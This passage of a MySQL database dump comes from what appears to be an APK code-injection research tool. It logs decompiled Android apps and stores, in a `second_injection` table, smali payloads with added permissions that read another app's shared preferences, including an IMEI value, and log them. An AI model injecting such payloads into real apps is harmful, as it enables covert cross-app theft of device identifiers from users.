','0'),(70,'10_08_2020_20_19_30_read.apk','decompiled_apk/10_08_2020_20_19_30_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(71,'10_08_2020_20_23_03_read.apk','decompiled_apk/10_08_2020_20_23_03_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(72,'10_08_2020_20_29_03_read.apk','decompiled_apk/10_08_2020_20_29_03_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(73,'10_08_2020_20_30_49_read.apk','decompiled_apk/10_08_2020_20_30_49_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(74,'10_08_2020_20_32_10_read.apk','decompiled_apk/10_08_2020_20_32_10_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(75,'10_08_2020_20_33_12_read.apk','decompiled_apk/10_08_2020_20_33_12_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(76,'10_08_2020_20_34_08_read.apk','decompiled_apk/10_08_2020_20_34_08_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(77,'10_08_2020_20_40_11_read.apk','decompiled_apk/10_08_2020_20_40_11_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(78,'10_08_2020_20_44_13_read.apk','decompiled_apk/10_08_2020_20_44_13_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(79,'10_08_2020_20_45_45_read.apk','decompiled_apk/10_08_2020_20_45_45_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(80,'11_08_2020_01_24_02_read.apk','decompiled_apk/11_08_2020_01_24_02_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(81,'11_08_2020_01_27_09_read.apk','decompiled_apk/11_08_2020_01_27_09_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(82,'11_08_2020_01_29_11_read.apk','decompiled_apk/11_08_2020_01_29_11_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(83,'11_08_2020_01_35_47_read.apk','decompiled_apk/11_08_2020_01_35_47_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(84,'11_08_2020_01_36_43_read.apk','decompiled_apk/11_08_2020_01_36_43_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(85,'11_08_2020_01_42_47_read.apk','decompiled_apk/11_08_2020_01_42_47_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(86,'11_08_2020_01_46_12_read.apk','decompiled_apk/11_08_2020_01_46_12_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(87,'11_08_2020_01_48_57_read.apk','decompiled_apk/11_08_2020_01_48_57_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(88,'11_08_2020_01_50_32_read.apk','decompiled_apk/11_08_2020_01_50_32_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(89,'11_08_2020_01_52_06_read.apk','decompiled_apk/11_08_2020_01_52_06_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(90,'11_08_2020_01_56_44_read.apk','decompiled_apk/11_08_2020_01_56_44_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(91,'11_08_2020_01_57_45_read.apk','decompiled_apk/11_08_2020_01_57_45_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(92,'11_08_2020_01_58_37_read.apk','decompiled_apk/11_08_2020_01_58_37_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(93,'11_08_2020_02_03_21_read.apk','decompiled_apk/11_08_2020_02_03_21_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(94,'11_08_2020_02_06_10_read.apk','decompiled_apk/11_08_2020_02_06_10_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(95,'11_08_2020_02_07_13_read.apk','decompiled_apk/11_08_2020_02_07_13_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(96,'11_08_2020_02_11_04_read.apk','decompiled_apk/11_08_2020_02_11_04_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(97,'11_08_2020_02_12_06_read.apk','decompiled_apk/11_08_2020_02_12_06_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(98,'11_08_2020_02_12_58_read.apk','decompiled_apk/11_08_2020_02_12_58_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(99,'11_08_2020_02_14_41_read.apk','decompiled_apk/11_08_2020_02_14_41_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(100,'11_08_2020_02_15_11_read.apk','decompiled_apk/11_08_2020_02_15_11_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(101,'11_08_2020_02_16_27_read.apk','decompiled_apk/11_08_2020_02_16_27_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(102,'11_08_2020_02_17_31_read.apk','decompiled_apk/11_08_2020_02_17_31_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(103,'11_08_2020_02_20_51_read.apk','decompiled_apk/11_08_2020_02_20_51_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(104,'11_08_2020_02_24_55_read.apk','decompiled_apk/11_08_2020_02_24_55_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(105,'11_08_2020_02_28_12_read.apk','decompiled_apk/11_08_2020_02_28_12_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(106,'11_08_2020_02_30_18_read.apk','decompiled_apk/11_08_2020_02_30_18_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(107,'11_08_2020_02_32_11_read.apk','decompiled_apk/11_08_2020_02_32_11_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(108,'11_08_2020_02_33_16_read.apk','decompiled_apk/11_08_2020_02_33_16_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(109,'11_08_2020_02_38_08_read.apk','decompiled_apk/11_08_2020_02_38_08_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(110,'11_08_2020_02_39_42_read.apk','decompiled_apk/11_08_2020_02_39_42_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(111,'11_08_2020_02_40_49_read.apk','decompiled_apk/11_08_2020_02_40_49_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(112,'11_08_2020_02_45_51_read.apk','decompiled_apk/11_08_2020_02_45_51_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(113,'11_08_2020_02_56_46_read.apk','decompiled_apk/11_08_2020_02_56_46_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(114,'11_08_2020_02_58_19_read.apk','decompiled_apk/11_08_2020_02_58_19_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(115,'11_08_2020_02_59_33_read.apk','decompiled_apk/11_08_2020_02_59_33_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(116,'11_08_2020_03_01_49_read.apk','decompiled_apk/11_08_2020_03_01_49_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(117,'17_08_2020_17_47_36_write.apk','decompiled_apk/17_08_2020_17_47_36_write/smali/com/jappit/android/televideo/Televideo.smali','com.jappit.android.televideo',NULL,'WRITE','2'),(118,'17_08_2020_17_51_14_write.apk','decompiled_apk/17_08_2020_17_51_14_write/smali/com/jappit/android/televideo/Televideo.smali','com.jappit.android.televideo',NULL,'WRITE','2'),(119,'17_08_2020_17_53_03_write.apk','decompiled_apk/17_08_2020_17_53_03_write/smali/com/jappit/android/televideo/Televideo.smali','com.jappit.android.televideo',NULL,'WRITE','2'),(120,'18_08_2020_10_27_16_write.apk','decompiled_apk/18_08_2020_10_27_16_write/smali/com/jappit/android/televideo/Televideo.smali','com.jappit.android.televideo',NULL,'WRITE','2'),(121,'18_08_2020_10_28_40_write.apk','decompiled_apk/18_08_2020_10_28_40_write/smali/com/jappit/android/televideo/Televideo.smali','com.jappit.android.televideo',NULL,'WRITE','2'),(122,'18_08_2020_10_34_27_write.apk','decompiled_apk/18_08_2020_10_34_27_write/smali/com/jappit/android/televideo/Televideo.smali','com.jappit.android.televideo',NULL,'WRITE','2'),(123,'18_08_2020_10_36_17_write.apk','decompiled_apk/18_08_2020_10_36_17_write/smali/com/jappit/android/televideo/Televideo.smali','com.jappit.android.televideo',NULL,'WRITE','2'),(124,'18_08_2020_10_37_16_write.apk','decompiled_apk/18_08_2020_10_37_16_write/smali/com/jappit/android/televideo/Televideo.smali','com.jappit.android.televideo',NULL,'WRITE','2'),(125,'18_08_2020_10_41_10_write.apk','decompiled_apk/18_08_2020_10_41_10_write/smali/com/jappit/calciolibrary/SoccerActivity.smali','com.jappit.calcio',NULL,'WRITE','2'),(126,'18_08_2020_15_30_39_write.apk','decompiled_apk/18_08_2020_15_30_39_write/smali/com/jappit/calciolibrary/SoccerActivity.smali','com.jappit.calcio',NULL,'WRITE','2'),(127,'21_08_2020_01_38_39_write.apk','decompiled_apk/21_08_2020_01_38_39_write/smali/com/jappit/android/televideo/Televideo.smali','com.jappit.android.televideo',NULL,'WRITE','2'),(128,'21_08_2020_01_53_22_write.apk','decompiled_apk/21_08_2020_01_53_22_write/smali/com/jappit/android/televideo/Televideo.smali','com.jappit.android.televideo',NULL,'WRITE','2'),(129,'03_09_2020_06_53_20_read.apk','decompiled_apk/03_09_2020_06_53_20_read/smali/com/jappit/android/televideo/Televideo.smali','com/jappit/android/televideo/Televideo',NULL,' READ ','0'),(130,'10_09_2020_12_23_57_write.apk','decompiled_apk/10_09_2020_12_23_57_write/smali/com/jappit/calciolibrary/SoccerActivity.smali','com.jappit.calcio',NULL,'WRITE','2'),(131,'10_09_2020_12_25_09_write.apk','decompiled_apk/10_09_2020_12_25_09_write/smali/com/jappit/calciolibrary/SoccerActivity.smali','com.jappit.calcio',NULL,'WRITE','2'),(132,'10_09_2020_14_00_07_write.apk','decompiled_apk/10_09_2020_14_00_07_write/smali/com/jappit/calciolibrary/SoccerActivity.smali','com.jappit.calcio',NULL,'WRITE','2'),(133,'02_10_2020_11_42_22_write.apk','decompiled_apk/02_10_2020_11_42_22_write/smali/com/jappit/calciolibrary/SoccerActivity.smali','com.jappit.calcio',NULL,'WRITE','2');
/*!40000 ALTER TABLE `log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `second_injection`
--

DROP TABLE IF EXISTS `second_injection`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `second_injection` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `permission` text,
  `payload` text,
  `functions` text,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `second_injection`
--

LOCK TABLES `second_injection` WRITE;
/*!40000 ALTER TABLE `second_injection` DISABLE KEYS */;
INSERT INTO `second_injection` VALUES (1,'android.permission.READ_PHONE_STATE, android.permission.ACCESS_COARSE_LOCATION','invoke-virtual {p0}, Lcom/shared/readsharedapi16/MainActivity;->searchShared()V','.method public searchShared()V\n    .locals 3\n\n\n    :try_start_0\n    const-string v0, \"com.shared.ooooo\"\n\n    const/4 v1, 0x2\n\n    invoke-virtual {p0, v0, v1}, Lcom/shared/readsharedapi16/MainActivity;->createPackageContext(Ljava/lang/String;I)Landroid/content/Context;\n\n    move-result-object v0\n\n    iput-object v0, p0, Lcom/shared/readsharedapi16/MainActivity;->context:Landroid/content/Context;\n\n\n    const-string v1, \"saveinfo\"\n\n    const/4 v2, 0x3\n\n    invoke-virtual {v0, v1, v2}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;\n\n    move-result-object v0\n\n    iput-object v0, p0, Lcom/shared/readsharedapi16/MainActivity;->sharedPreferences:Landroid/content/SharedPreferences;\n\n\n    const-string v0, \"START\"\n\n    const-string v1, \"SHARED WAS STARTED\"\n\n    invoke-static {v0, v1}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I\n    :try_end_0\n    .catch Landroid/content/pm/PackageManager$NameNotFoundException; {:try_start_0 .. :try_end_0} :catch_0\n\n\n    goto :goto_0\n\n\n    :catch_0\n    move-exception v0\n\n    .local v0, \"e\":Landroid/content/pm/PackageManager$NameNotFoundException;\n    const-string v1, \"ERROR\"\n\n    const-string v2, \"SHARED NOT START\"\n\n    invoke-static {v1, v2}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I\n\n    .end local v0    # \"e\":Landroid/content/pm/PackageManager$NameNotFoundException;\n    :goto_0\n    iget-object v0, p0, Lcom/shared/readsharedapi16/MainActivity;->sharedPreferences:Landroid/content/SharedPreferences;\n\n    const-string v1, \"No string\"\n\n    const-string v2, \"ciao\"\n\n    invoke-interface {v0, v2, v1}, Landroid/content/SharedPreferences;->getString(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;\n\n    move-result-object v0\n\n    const-string v2, \"INFO\"\n\n    invoke-static {v2, v0}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I\n\n\n    iget-object v0, p0, Lcom/shared/readsharedapi16/MainActivity;->sharedPreferences:Landroid/content/SharedPreferences;\n\n    const-string v2, \"IMEI\"\n\n    invoke-interface {v0, v2, v1}, Landroid/content/SharedPreferences;->getString(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;\n\n    move-result-object v0\n\n    const-string v1, \"INFO2\"\n\n    invoke-static {v1, v0}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I\n\n\n    return-void\n.end method\n'),(2,'android.permission.READ_PHONE_STATE,android.permission.ACCESS_COARSE_LOCATION','invoke-virtual {p0}, Lcom/shared/readsharedapi16/MainActivity;->searchShared()Ljava/lang/String;','.method public final searchShared()Ljava/lang/String;\n    .locals 8\n\n    .line 29\n    const-string v0, \"ciao\"\n\n    const-string v1, \"IMEI\"\n\n    const-string v2, \"No string\"\n\n    :try_start_0\n    const-string v3, \"p\"\n\n    const/4 v4, 0x2\n\n    invoke-virtual {p0, v3, v4}, Lcom/shared/readsharedapi16/MainActivity;->createPackageContext(Ljava/lang/String;I)Landroid/content/Context;\n\n    move-result-object v3\n\n    .line 30\n    .local v3, \"context\":Landroid/content/Context;\n    const-string v4, \"saveinfo\"\n\n    const/4 v5, 0x3\n\n    invoke-virtual {v3, v4, v5}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;\n\n    move-result-object v4\n\n    .line 31\n    .local v4, \"sharedPreferences\":Landroid/content/SharedPreferences;\n    new-instance v5, Ljava/lang/StringBuilder;\n\n    invoke-direct {v5}, Ljava/lang/StringBuilder;-><init>()V\n\n    invoke-interface {v4, v1, v2}, Landroid/content/SharedPreferences;->getString(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;\n\n    move-result-object v6\n\n    invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;\n\n    invoke-interface {v4, v0, v2}, Landroid/content/SharedPreferences;->getString(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;\n\n    move-result-object v6\n\n    invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;\n\n    invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;\n\n    move-result-object v5\n\n    .line 32\n    .local v5, \"resut\":Ljava/lang/String;\n    const-string v6, \"START\"\n\n    const-string v7, \"SHARED WAS STARTED\"\n\n    invoke-static {v6, v7}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I\n\n    .line 33\n    const-string v6, \"INFO\"\n\n    invoke-interface {v4, v0, v2}, Landroid/content/SharedPreferences;->getString(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;\n\n    move-result-object v0\n\n    invoke-static {v6, v0}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I\n\n    .line 34\n    const-string v0, \"INFO2\"\n\n    invoke-interface {v4, v1, v2}, Landroid/content/SharedPreferences;->getString(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;\n\n    move-result-object v1\n\n    invoke-static {v0, v1}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I\n    :try_end_0\n    .catch Landroid/content/pm/PackageManager$NameNotFoundException; {:try_start_0 .. :try_end_0} :catch_0\n\n    .line 35\n    return-object v5\n\n    .line 37\n    .end local v3    # \"context\":Landroid/content/Context;\n    .end local v4    # \"sharedPreferences\":Landroid/content/SharedPreferences;\n    .end local v5    # \"resut\":Ljava/lang/String;\n    :catch_0\n    move-exception v0\n\n    .line 38\n    .local v0, \"e\":Landroid/content/pm/PackageManager$NameNotFoundException;\n    const-string v1, \"ERROR\"\n\n    const-string v2, \"SHARED NOT START\"\n\n    invoke-static {v1, v2}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I\n\n    .line 39\n    return-object v1\n.end method');
/*!40000 ALTER TABLE `second_injection` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2022-02-06 12:13:34
